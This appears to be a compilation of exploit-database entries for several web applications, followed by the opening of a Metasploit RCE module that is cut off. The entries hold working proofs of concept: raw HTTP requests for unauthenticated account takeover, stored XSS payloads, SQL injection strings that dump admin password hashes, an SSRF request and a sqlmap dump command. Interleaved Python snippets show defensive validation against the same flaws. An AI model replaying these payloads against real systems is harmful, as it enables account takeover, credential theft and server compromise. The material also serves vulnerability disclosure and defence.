<pre><code>#Exploit Title: Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated)<br />#Date: 11/01/2022<br />#Exploit Author: Himash<br />#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip<br />#Version: 1.0<br />#Tested on: Kali Linux<br /><br /><br />Online Diagnostic Lab Management System 1.0 is vulnerable to unauthenticated account takeover.<br />An attacker can take over any registered 'Staff' user account by just sending the below POST request,<br />changing the "id", "email", "password" and "cpass" parameters.<br /><br />#Steps to Reproduce<br /><br />1. Send the below POST request, changing the "id", "email", "password" and "cpass" parameters.<br /><br />2. Log in to the user account with the changed email and password.<br /><br />POST /odlms/classes/Users.php?f=save_client HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------218422725412817326673495861673<br />Content-Length: 1551<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/odlms/?page=user<br />Cookie: PHPSESSID=b17cc4d8837f564fc77d7b3e49b00d1e<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="id"<br /><br />2<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="firstname"<br /><br />Claire<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="middlename"<br /><br />C<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="lastname"<br /><br />Blake<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="gender"<br /><br />Female<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="dob"<br /><br />1997-10-14<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="contact"<br /><br />09456789123<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="address"<br /><br />Sample Address only<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="email"<br /><br />test@test.com<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="password"<br /><br />Test@1234<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="cpass"<br /><br />Test@1234<br />-----------------------------218422725412817326673495861673<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------218422725412817326673495861673--<br /><br /></code></pre>
<pre><code>#Exploit Title: Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)<br />#Date: 11/01/2022<br />#Exploit Author: Himash<br />#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip<br />#Version: 1.0<br />#Tested on: Kali Linux<br /><br />Online Diagnostic Lab Management System 1.0 is vulnerable to stored cross-site scripting.<br />Stored cross-site scripting (persistent XSS) arises when an application receives its data from<br />an untrusted source and includes that data within its responses in an unsafe way.<br /><br />#Steps to Reproduce<br /><br />1. Log in to the admin account with username 'admin' and password 'admin123'<br /><br />2. Navigate to the 'User List' option<br /><br />3. Create a new user by adding the following payload in the<br /> First Name and Last Name fields.<br /> <image src/onerror=prompt(document.cookie)><br /><br />4. The XSS payload will be triggered on the page http://localhost/odlms/admin/?page=user/list<br /><br /></code></pre>
<pre><code>#Exploit Title: Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)<br />#Date: 11/01/2022<br />#Exploit Author: Himash<br />#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip<br />#Version: 1.0<br />#Tested on: Kali Linux 2021.4, PHP 7.2.34<br /><br />#SQL Injection<br />SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.<br />Online Diagnostic Lab Management System 1.0 is vulnerable to SQL injection in the 'id' parameter of the 'appointment list' page.<br /><br />#Steps to reproduce<br /><br />The following URL is vulnerable to SQL injection in the 'id' field.<br /><br />http://localhost/odlms/?page=appointments/view_appointment&id=1%27%20AND%20(SELECT%208053%20FROM%20(SELECT(SLEEP(7)))dJOC)%20AND%20%27test%27=%27test<br /><br />The server accepts the payload and the response is delayed by 7 seconds.<br /><br />#Impact<br /><br />An attacker can compromise the application's database manually or with automated tools such as sqlmap.<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection<br /># Date: 11/01/2022<br /># Exploit Author: Aryan Chehreghani<br /># Vendor Homepage: https://wordpress.org<br /># Software Link: https://wordpress.org/download/releases<br /># Version: < 5.8.3<br /># Tested on: Windows 10<br /># CVE : CVE-2022-21661<br /><br /># [ VULNERABILITY DETAILS ] :<br /><br />#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core.<br />#Authentication is not required to exploit this vulnerability. The specific flaw exists within the WP_Query class.<br />#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries.<br />#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.<br /><br /># [ References ] :<br /><br />https://wordpress.org/news/category/releases<br />https://www.zerodayinitiative.com/advisories/ZDI-22-020<br />https://hackerone.com/reports/1378209<br /><br /># [ Sample Request ] :<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Upgrade-Insecure_Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: cross-site<br />Sec-Fetch-User: ?1<br />Cache-Control: max-age=0<br />Connection: close <br />Content-Type: application/x-www-form-urlencoded<br /><br />action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}<br /></code></pre>
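An added example, not WordPress code: a validator for the query_vars structure in the request above that refuses non-integer terms on id-type fields (the class of sanitisation needed before such terms reach a query). The tax_query field names are assumed from WordPress; the request body is the advisory's, with its placeholders kept as-is.

```python
import json
from urllib.parse import parse_qs

# Fields whose terms are compared against integer columns, and string fields.
INT_FIELDS = {"term_taxonomy_id", "term_id"}
STR_FIELDS = {"slug", "name"}


def _clean_terms(field, terms):
    if not isinstance(terms, list):
        terms = [terms]
    if field in INT_FIELDS:
        out = []
        for t in terms:
            # bool is an int subclass; treat it as garbage rather than 0/1
            if isinstance(t, bool) or not (isinstance(t, int) or (isinstance(t, str) and t.isdigit())):
                raise ValueError(f"non-integer term for {field}: {t!r}")
            out.append(int(t))
        return out
    if field in STR_FIELDS:
        return [str(t) for t in terms]
    raise ValueError(f"unknown field {field!r}")


def clean_tax_query(tax_query):
    """Return a sanitized copy of a WP-style tax_query (dict or list of clauses,
    optionally nested with a 'relation' key). Raises ValueError on any term
    that does not fit its field, instead of letting the string reach SQL."""
    items = tax_query.items() if isinstance(tax_query, dict) else enumerate(tax_query)
    cleaned = {}
    for key, clause in items:
        if key == "relation":
            if clause not in ("AND", "OR"):
                raise ValueError("bad relation")
            cleaned[key] = clause
            continue
        if not isinstance(clause, dict):
            raise ValueError("clause must be an object")
        if "terms" not in clause and "taxonomy" not in clause:   # nested group
            cleaned[key] = clean_tax_query(clause)
            continue
        field = clause.get("field", "term_id")
        cleaned[key] = dict(clause, field=field, terms=_clean_terms(field, clause.get("terms", [])))
    return cleaned


def validate_admin_ajax_body(body):
    """Parse a body shaped like the advisory's sample request and validate its
    query_vars. Returns (ok, cleaned_tax_query) or (False, reason)."""
    params = parse_qs(body, keep_blank_values=True)
    try:
        query_vars = json.loads(params.get("query_vars", ["{}"])[0])
        if not isinstance(query_vars, dict):
            raise ValueError("query_vars must be an object")
        return True, clean_tax_query(query_vars.get("tax_query", {}))
    except (ValueError, TypeError) as exc:   # json.JSONDecodeError is a ValueError
        return False, str(exc)


# The body from the advisory above (placeholders kept) and a benign variant.
ADVISORY_BODY = ('action=<action_name>&nonce=a85a0c3bfa&query_vars='
                 '{"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}')
BENIGN_BODY = ('action=<action_name>&nonce=a85a0c3bfa&query_vars='
               '{"tax_query":{"0":{"field":"term_taxonomy_id","terms":["12","7"]}}}')
```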
<pre><code># Exploit Title: Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS)<br /># Exploit Author: (Sant268)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html<br /># Version: HPRMS 1.0<br /># Tested on: Ubuntu 20, Apache<br /><br />- Description:<br />A Stored XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.<br /><br />- Payload used:<br /><img src =q onerror=prompt(8)><br /><br />- Steps to reproduce:<br />1- Go to http://victim.com/admin/?page=doctors<br />2- Add a Doctor, paste the payload in specialization<br />3- An alert will pop whenever the page is accessed.<br /><br /><br /><br />----<br /><br /><br /># Exploit Title: Hospitals Patient Records Management System 1.0 - 'room_list' Stored Cross Site Scripting (XSS)<br /># Exploit Author: (Sant268)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html<br /># Version: HPRMS 1.0<br /># Tested on: Ubuntu 20, Apache<br /><br />- Description:<br />An XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.<br /><br />- Payload used:<br /><img src =q onerror=prompt(8)><br /><br />- Steps to reproduce:<br />1- Go to http://victim.com/admin/?page=room_list<br />2- Add Room type, paste the payload in description<br />3- An alert will pop whenever the page is accessed.<br /><br /><br />----<br /><br /># Exploit Title: Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS)<br /># Exploit Author: (Sant268)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html<br /># Version: HPRMS 1.0<br /># Tested on: Ubuntu 20, Apache<br /><br />- Description:<br />An XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.<br /><br />- Payload used:<br /><img src =q onerror=prompt(8)><br /><br />- Steps to reproduce:<br />1- Go to http://victim.com/admin/?page=room_types<br />2- Add Room type, paste the payload in description<br />3- An alert will pop whenever the page is accessed.<br /><br /><br /></code></pre>
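As an added example covering the three HPRMS entries and the ODLMS stored XSS above (not the applications' code): the two quoted payloads run through a tag blocklist, an input allow-list, and plain output escaping; the blocklist is included only to show why the `<image` variant slips past it.

```python
import html
import re

# The two payloads quoted in the advisories above, as constructed test inputs.
PAYLOADS = [
    "<image src/onerror=prompt(document.cookie)>",
    "<img src =q onerror=prompt(8)>",
]

NAME_RE = re.compile(r"[\w' .-]{1,60}")


def valid_name(value: str) -> bool:
    """Input side: a name, specialization or room type never legitimately
    contains < > = ( ) or /. This narrows the surface; it is not the primary
    defence because other fields legitimately carry such characters."""
    return NAME_RE.fullmatch(value) is not None


def naive_blocklist(value: str) -> str:
    """What a hurried patch often does: strip a few known tags. Kept only to
    show the failure: browsers parse an <image> start tag as <img>, so the
    first payload survives this filter untouched."""
    return re.sub(r"<\s*/?\s*(img|script)\b[^>]*>", "", value, flags=re.IGNORECASE)


def render_row(*cells: str) -> str:
    """Output side: every dynamic value is HTML-escaped. quote=True also
    escapes quotes, so a value cannot break out of an attribute either."""
    return "<tr>" + "".join(f"<td>{html.escape(c, quote=True)}</td>" for c in cells) + "</tr>"


def has_foreign_tag(fragment: str) -> bool:
    """Check helper: any '<' that does not start the tr/td scaffolding."""
    return re.search(r"<(?!/?t[rd]\b)", fragment) is not None
```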
<pre><code># Exploit Title: SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)<br /># Exploit Author: Betul Denizler<br /># Vendor Homepage: https://salonerp.sourceforge.io/<br /># Software Link: https://sourceforge.net/projects/salonerp/files/latest/download<br /># Version: SalonERP v3.0.1<br /># Tested on: Ubuntu Mate 20.04<br /># Vulnerable Parameter: sql<br /># Date: 11/01/2022<br />'''<br />DESCRIPTION<br />========<br />The vulnerability allows an attacker to inject a payload through the 'sql' parameter of the SQL query used while generating a report. Upon successfully discovering the admin login password hash, it can be decrypted to obtain the plain-text password.<br /><br /><br />POC REQUEST:<br />========<br />POST /salonerp/report.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 755<br />Origin: http://127.0.0.1<br />Connection: close<br />Cookie: salonerp-id=vDF9uCpfqQAXuNhsCWvH; PHPSESSID=e170a8c9dfeef78751cb49b9977b2373<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />save=&title=bestCustomers&font=Times&fontSize=12&sql=SELECT%0A%09%09%09%09%09%09(select+concat(u.name%2C'+'%2Cu.password)+from+Models%5CUser+u+where+u.id+%3D+1)+AS+userpass%2C%0A%09%09%09%09%09%09COUNT(i.id)+AS+amount%2C%0A%09%09%09%09%09%09SUM(i.cash+%2B+i.bank)+as+revenue%0A%09%09%09%09%09FROM+Models%5CInvoice+i%0A%09%09%09%09%09JOIN+i.event+e%0A%09%09%09%09%09JOIN+e.customer+c%0A%09%09%09%09%09WHERE+DATE_DIFF(i.date%2C+%3AstartDate)+%3E%3D+0%0A%09%09%09%09%09AND+DATE_DIFF(i.date%2C+%3AendDate)+%3C%3D+0%0A%09%09%09%09%09GROUP+BY+e.customer%0A%09%09%09%09%09ORDER+BY+revenue+DESC&ask%5B0%5D%5Bname%5D=startDate&ask%5B0%5D%5Bvalue%5D=2021-12-14T00%3A00%3A00&ask%5B1%5D%5Bname%5D=endDate&ask%5B1%5D%5Bvalue%5D=2021-12-15T00%3A00%3A00&currency%5B%5D=2<br /><br />EXPLOITATION<br />========<br />1. Create a database and login panel<br />2. Create employees in the settings<br />3. Create Products, Customers and Events<br />4. Pay for Products on Event<br />5. Create a report from the "Reports" menu<br />6. Inject the payload into the "sql" parameter of the POST request that generates the report<br /><br />Payload: (select+concat(u.name,'+',u.password)+from+Models\User+u+where+u.id+=+1)+AS+userpass<br />'''<br /></code></pre>
<pre><code><br />OpenBMCS 2.4 Secrets Disclosure<br /><br /><br />Vendor: OPEN BMCS<br />Product web page: https://www.openbmcs.com<br />Affected version: 2.4<br /><br />Summary: Building Management & Controls System (BMCS). No matter what the<br />size of your business, the OpenBMCS software has the ability to expand to<br />hundreds of controllers. Our product can control and monitor anything from<br />a garage door to a complete campus wide network, with everything you need<br />on board.<br /><br />Desc: The application allows directory listing and information disclosure of<br />some sensitive files that can allow an attacker to leverage the disclosed<br />information and gain full BMS access.<br /><br />Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)<br /> Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)<br /> Apache/2.4.41 (Ubuntu)<br /> Apache/2.4.25 (Debian)<br /> nginx/1.16.1<br /> PHP/7.4.3<br /> PHP/7.0.33-0+deb9u9<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5695<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php<br /><br /><br />26.10.2021<br /><br />--<br /><br /><br />https://192.168.1.222/debug/<br /><br />Index of /debug<br /><br />change_password_sqls<br />clear_all_watches.php<br />controllerlog/<br />dash/<br />dodgy.php<br />fix_out.php<br />graphics/<br />graphics_diag.php<br />graphics_ip_diag/<br />jace_info.php<br />kits/<br />mysession.php<br />nuke.php<br />obix_test.php<br />print_tree.php<br />reboot_backdoor.php<br />rerunSQLUpdates.php<br />reset_alarm_trigger_times.php<br />system/<br />test_chris_obix.php<br />timestamp.php<br />tryEmail.php<br />trysms.php<br />unit_testing/<br />userlog/<br /><br />...<br />...<br /><br />/cache/<br />/classes/<br />/config/<br />/controllers/<br />/core/<br />/css/<br />/display/<br />/fonts/<br />/images/<br />/js/<br />/php/<br />/plugins/<br />/sounds/<br />/temp/<br />/tools/<br 
/>/core/assets/<br />/core/backup/<br />/core/crontab/<br />/core/font/<br />/core/fonts/<br />/core/license/<br />/core/load/<br />/core/logout/<br />/core/password/<br />/php/audit/<br />/php/phpinfo.php<br />/php/temp/<br />/php/templates/<br />/php/test/<br />/php/weather/<br />/plugins/alarms/<br />/tools/phpmyadmin/index.php<br />/tools/migrate.php<br /></code></pre>
<pre><code><br />OpenBMCS 2.4 Unauthenticated SSRF / RFI<br /><br /><br />Vendor: OPEN BMCS<br />Product web page: https://www.openbmcs.com<br />Affected version: 2.4<br /><br />Summary: Building Management & Controls System (BMCS). No matter what the<br />size of your business, the OpenBMCS software has the ability to expand to<br />hundreds of controllers. Our product can control and monitor anything from<br />a garage door to a complete campus wide network, with everything you need<br />on board.<br /><br />Desc: An unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include<br />(RFI) vulnerability exists in OpenBMCS within its functionalities. The application<br />parses user supplied data in the POST parameter 'ip' to query a server IP on port<br />81 by default. Since no validation is carried out on the parameter, an attacker<br />can specify an external domain and force the application to make an HTTP request<br />to an arbitrary destination host. This can be used by an external attacker, for<br />example, to bypass firewalls and initiate service and network enumeration on the<br />internal network through the affected application, hijack the current session of<br />the user, execute cross-site scripting code, or change the look of the page and<br />modify content on the current display.<br /><br />Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)<br /> Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)<br /> Apache/2.4.41 (Ubuntu)<br /> Apache/2.4.25 (Debian)<br /> nginx/1.16.1<br /> PHP/7.4.3<br /> PHP/7.0.33-0+deb9u9<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5694<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php<br /><br /><br />26.10.2021<br /><br />--<br /><br /><br />POST /php/query.php HTTP/1.1<br />Host: 192.168.1.222<br />Content-Length: 29<br />Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"<br />Accept: 
*/*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />ip=www.columbia.edu:80&argu=/<br /><br /><br />HTTP/1.1 302 Found<br />Date: Tue, 14 Dec 2021 20:26:47 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Location: ../login.php<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 32141<br /><br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><br /><html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><br /><br /><!-- developed by CUIT --><br /><!-- 08/28/18, 8:55:54am --><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br /><meta http-equiv="X-UA-Compatible" content="IE=edge" ><br /><meta name="msvalidate.01" content="DB472D6D4C7DB1E74C6D939F9C8AA8B4" /><br /><title>Columbia University in the City of New York</title><br />...<br />...<br /></code></pre>
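An added example, not OpenBMCS code: a validator for the 'ip' POST parameter that admits only IP literals inside an assumed controller subnet on the default port 81 named above. The subnet (192.168.1.0/24) and the port set are assumptions for the demo, not values from the advisory.

```python
from __future__ import annotations

import ipaddress

# Assumed deployment facts (not stated in the advisory): the controllers the
# application may query live in this subnet and expose only port 81.
ALLOWED_NETS = [ipaddress.ip_network("192.168.1.0/24")]
ALLOWED_PORTS = {81}


def _port(text: str) -> int:
    if not text.isdigit() or not 1 <= int(text) <= 65535:
        raise ValueError(f"bad port {text!r}")
    return int(text)


def split_host_port(raw: str, default_port: int = 81) -> tuple[str, int]:
    """Split 'host', 'host:port', '[v6]' or '[v6]:port' without touching DNS."""
    raw = raw.strip()
    if raw.startswith("["):
        end = raw.find("]")
        if end < 0:
            raise ValueError("unterminated IPv6 bracket")
        host, rest = raw[1:end], raw[end + 1:]
        if rest == "":
            return host, default_port
        if not rest.startswith(":"):
            raise ValueError("junk after IPv6 literal")
        return host, _port(rest[1:])
    if raw.count(":") == 1:
        host, port = raw.split(":")
        return host, _port(port)
    return raw, default_port          # no colon, or a bare IPv6 literal


def check_ip_param(raw: str) -> tuple[bool, str]:
    """Decide whether the 'ip' parameter may be contacted. The value must be an
    IP literal (hostnames are refused, so nothing is ever resolved on user
    input), must fall inside ALLOWED_NETS, must not be a special-purpose
    address, and must use an allowed port. Returns (allowed, target_or_reason)."""
    try:
        host, port = split_host_port(raw)
        addr = ipaddress.ip_address(host)    # strict: rejects '0x7f.1', '2130706433', names
    except ValueError as exc:
        return False, f"rejected: {exc}"
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped             # ::ffff:a.b.c.d is judged as a.b.c.d
    if addr.is_loopback or addr.is_link_local or addr.is_multicast or addr.is_unspecified:
        return False, f"rejected: {addr} is a special-purpose address"
    if not any(addr in net for net in ALLOWED_NETS):
        return False, f"rejected: {addr} is outside the controller networks"
    if port not in ALLOWED_PORTS:
        return False, f"rejected: port {port} is not permitted"
    return True, f"{addr}:{port}"
```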
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/db9629508fda139f71f625d764c7eff7_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: AgentTesla Builder Web Panel<br />Vulnerability: SQL Injection<br />Description: The AgentTeslaBuilder WebUI uses ionCube to encode and protect its PHP code. However, the parameter 'table' is vulnerable to post-auth SQL Injection. Authenticated users can easily dump all databases, tables and contents including the MySQL database schema. Manually testing the panel, I identified an SQL error when probing the following URL /AgentTeslaBuilder/server_side/scripts/server_processing.php?table=%27HELL%20OR%201=1, which gave me "An SQL error occurred: SQLSTATE[42S02] Base table or view not found 1146 Table 'agenttesla.'hell or 1=1' doesn't exist". I then switched to sqlmap to do the heavy lifting.<br /><br />Database: agenttesla<br />Table: passwords<br />[1 entry]<br />+--------+-------------+--------+---------+--------+---------+---------------------+---------+----------+---------------------+<br />| hwid | password_id | pwd | host | status | client | time | pc_name | username | server_time |<br />+--------+-------------+--------+---------+--------+---------+---------------------+---------+----------+---------------------+<br />| 939394 | 1 | abc123 | x.x.x.x | 1 | windows | 2022-01-17 01:06:09 | tom | nubarr | 2022-01-17 01:06:09 |<br />+--------+-------------+--------+---------+--------+---------+---------------------+---------+----------+---------------------+<br /><br />Type: WebUI<br />MD5: db9629508fda139f71f625d764c7eff7 : "Agent Tesla.exe"<br />MD5: 978509c2a3d051b43e53bba1436b7076 : "login.php"<br />Vuln ID: MVID-2022-0455<br />Disclosure: 01/16/2022<br /><br />Exploit/PoC:<br />sqlmap.py -u "http://AGENT-TESLA-IP/AgentTeslaBuilder/server_side/scripts/server_processing.php?table=passwords --auth=admin:abc123" --dbms=MySQL --dump<br 
/><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
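An added example, not code from ODLMS, SalonERP or the AgentTesla panel, covering the three injection shapes on this page: a value ('id' on the appointment page), an identifier ('table' above) and a whole query ('sql' in the SalonERP report). It uses an in-memory SQLite schema constructed for the purpose; SalonERP's real reports are Doctrine DQL, modelled here as plain SQL.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory schema loosely shaped after the three applications."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE appointments (id INTEGER PRIMARY KEY, patient TEXT);
        INSERT INTO appointments VALUES (1, 'Claire Blake'), (2, 'Sam Doe');
        CREATE TABLE passwords (password_id INTEGER PRIMARY KEY, pwd TEXT);
        INSERT INTO passwords VALUES (1, 'abc123');
        CREATE TABLE invoices (id INTEGER PRIMARY KEY, customer TEXT,
                               cash REAL, bank REAL, date TEXT);
        INSERT INTO invoices VALUES (1, 'Ann', 10, 5, '2021-12-14'),
                                    (2, 'Bob', 1, 1, '2021-12-14'),
                                    (3, 'Ann', 0, 20, '2021-12-16');
    """)
    return db


def safe(fn, *args):
    """Run fn, returning (True, result) or (False, error text), so a rejection
    can be observed without the exception propagating."""
    try:
        return True, fn(*args)
    except ValueError as exc:
        return False, str(exc)


# 1. Value position (ODLMS 'id'): validate the type, then bind. The SLEEP()
#    payload from the advisory never becomes part of the SQL text.
def view_appointment(db, raw_id: str):
    if not raw_id.isdigit():
        raise ValueError("id must be an integer")
    row = db.execute("SELECT patient FROM appointments WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


# 2. Identifier position (AgentTesla panel 'table'): placeholders cannot bind a
#    table name, so the client value selects an entry of a fixed allow-list and
#    the quoted identifier comes from the server side of that map.
TABLE_ALLOWLIST = {"appointments": "appointments", "invoices": "invoices"}


def count_rows(db, raw_table: str) -> int:
    table = TABLE_ALLOWLIST.get(raw_table)
    if table is None:
        raise ValueError(f"unknown table {raw_table!r}")
    return db.execute(f'SELECT COUNT(*) FROM "{table}"').fetchone()[0]


# 3. Whole-query position (SalonERP 'sql'): the report text lives on the server;
#    the client chooses a report by name and supplies only named values.
REPORTS = {
    "bestCustomers": (
        "SELECT customer, COUNT(id) AS amount, SUM(cash + bank) AS revenue "
        "FROM invoices WHERE date >= :startDate AND date <= :endDate "
        "GROUP BY customer ORDER BY revenue DESC",
        {"startDate", "endDate"},
    ),
}


def run_report(db, name: str, params: dict):
    if name not in REPORTS:
        raise ValueError(f"unknown report {name!r}")
    sql, expected = REPORTS[name]
    if set(params) != expected:
        raise ValueError("unexpected report parameters")
    return db.execute(sql, params).fetchall()
```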
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE',<br /> 'Description' => %q{<br /> This module exploits LFI and log poisoning vulnerabilities<br /> (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a<br /> build-242466 and older in order to achieve unauthenticated remote<br /> code execution as the root user. NetConfig is the Aerohive/Extreme<br /> Networks HiveOS administrative web interface. Vulnerable versions<br /> allow for LFI because they rely on a version of PHP 5 that is<br /> vulnerable to string truncation attacks. This module leverages this<br /> issue in conjunction with log poisoning to gain RCE as root.<br /><br /> Upon successful exploitation, the Aerohive NetConfig application<br /> will hang for as long as the spawned shell remains open. Closing<br /> the session should render the app responsive again.<br /><br /> The module provides an automatic cleanup option to clean the log.<br /> However, this option is disabled by default because any modifications<br /> to the /tmp/messages log, even via sed, may render the target<br /> (temporarily) unexploitable. 
